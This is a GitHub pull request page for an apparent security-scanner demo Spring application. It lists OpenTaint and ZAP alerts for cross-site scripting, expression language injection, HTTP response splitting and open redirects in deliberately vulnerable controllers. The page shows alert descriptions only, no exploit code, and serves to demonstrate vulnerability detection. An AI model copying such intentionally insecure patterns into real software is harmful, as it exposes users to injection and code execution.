Add OpenTaint + ZAP action and more controllers by misonijnik · Pull Request #5 · seqra/java-spring-demo

Check failure on line 123 in src/main/java/org/seqra/demo/controller/TemplateController.java

Code scanning / OpenTaint

Potential cross-site scripting (XSS) Error

Potential XSS: writing user input directly to a web page.

Check failure on line 117 in src/main/java/org/seqra/demo/controller/TemplateController.java

Code scanning / OpenTaint

Potential expression language injection Error

Potential code injection: calling Spring Expression Language method directly with user-supplied input may allow an adversary to read or modify sensitive data, bypass security checks, or, in severe cases, execute arbitrary code within the application's context.

Check failure on line 92 in src/main/java/org/seqra/demo/controller/TemplateController.java

Code scanning / OpenTaint

Potential cross-site scripting (XSS) Error

Potential XSS: writing user input directly to a web page.

Check failure on line 86 in src/main/java/org/seqra/demo/controller/TemplateController.java

Code scanning / OpenTaint

Potential expression language injection Error

Potential code injection: calling Spring Expression Language method directly with user-supplied input may allow an adversary to read or modify sensitive data, bypass security checks, or, in severe cases, execute arbitrary code within the application's context.

Check failure on line 70 in src/main/java/org/seqra/demo/controller/TemplateController.java

Code scanning / OpenTaint

Potential cross-site scripting (XSS) Error

Potential XSS: writing user input directly to a web page.

Check failure on line 69 in src/main/java/org/seqra/demo/controller/RedirectController.java

Code scanning / OpenTaint

Potential cross-site scripting (XSS) Error

Potential XSS: writing user input directly to a web page.

Check failure on line 64 in src/main/java/org/seqra/demo/controller/TemplateController.java

Code scanning / OpenTaint

Potential expression language injection Error

Potential code injection: calling Spring Expression Language method directly with user-supplied input may allow an adversary to read or modify sensitive data, bypass security checks, or, in severe cases, execute arbitrary code within the application's context.

Check failure on line 43 in src/main/java/org/seqra/demo/controller/TemplateController.java

Code scanning / OpenTaint

Potential cross-site scripting (XSS) Error

Potential XSS: writing user input directly to a web page.

Check failure on line 92 in src/main/java/org/seqra/demo/controller/RedirectController.java

Code scanning / OpenTaint + ZAP

Potential cross-site scripting (XSS) Error

Potential XSS: writing user input directly to a web page.

Check failure on line 37 in src/main/java/org/seqra/demo/controller/TemplateController.java

Code scanning / OpenTaint

Potential expression language injection Error

Potential code injection: calling Spring Expression Language method directly with user-supplied input may allow an adversary to read or modify sensitive data, bypass security checks, or, in severe cases, execute arbitrary code within the application's context.

Check failure on line 105 in src/main/java/org/seqra/demo/controller/RedirectController.java

Code scanning / OpenTaint + ZAP

Potential cross-site scripting (XSS) Error

Potential XSS: writing user input directly to a web page.

Check warning on line 103 in src/main/java/org/seqra/demo/controller/RedirectController.java

Code scanning / OpenTaint

HTTP response splitting Warning

Older Java application servers are vulnerable to HTTP response splitting, which may occur if an HTTP request can be injected with CRLF characters.

Check warning on line 86 in src/main/java/org/seqra/demo/controller/RedirectController.java

Code scanning / OpenTaint + ZAP

HTTP response splitting Warning

Older Java application servers are vulnerable to HTTP response splitting, which may occur if an HTTP request can be injected with CRLF characters.

Check warning on line 79 in src/main/java/org/seqra/demo/controller/RedirectController.java

Code scanning / OpenTaint + ZAP

HTTP response splitting Warning

Older Java application servers are vulnerable to HTTP response splitting, which may occur if an HTTP request can be injected with CRLF characters.

Check warning on line 51 in src/main/java/org/seqra/demo/controller/RedirectController.java

Code scanning / OpenTaint + ZAP

Application redirects to user-manipulated URL which can be malicious Warning

Application redirects to a destination URL specified by a user-supplied parameter that is not validated. This could direct users to malicious locations. Consider using an allowlist to validate URLs.

Check warning on line 48 in src/main/java/org/seqra/demo/controller/RedirectController.java

Code scanning / OpenTaint

HTTP response splitting Warning

Older Java application servers are vulnerable to HTTP response splitting, which may occur if an HTTP request can be injected with CRLF characters.

Check warning on line 44 in src/main/java/org/seqra/demo/controller/RedirectController.java

Code scanning / OpenTaint

HTTP response splitting Warning

Older Java application servers are vulnerable to HTTP response splitting, which may occur if an HTTP request can be injected with CRLF characters.

Check warning on line 31 in src/main/java/org/seqra/demo/controller/RedirectController.java

Code scanning / OpenTaint

HTTP response splitting Warning

Older Java application servers are vulnerable to HTTP response splitting, which may occur if an HTTP request can be injected with CRLF characters.

Check warning on line 28 in src/main/java/org/seqra/demo/controller/RedirectController.java

Code scanning / OpenTaint

HTTP response splitting Warning

Older Java application servers are vulnerable to HTTP response splitting, which may occur if an HTTP request can be injected with CRLF characters.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Add OpenTaint + ZAP action and more controllers #5

Uh oh!

Uh oh!

Add OpenTaint + ZAP action and more controllers #5

Uh oh!

19 new alerts including 11 errors

New alerts in code changed by this pull request

Annotations

Re-running checks...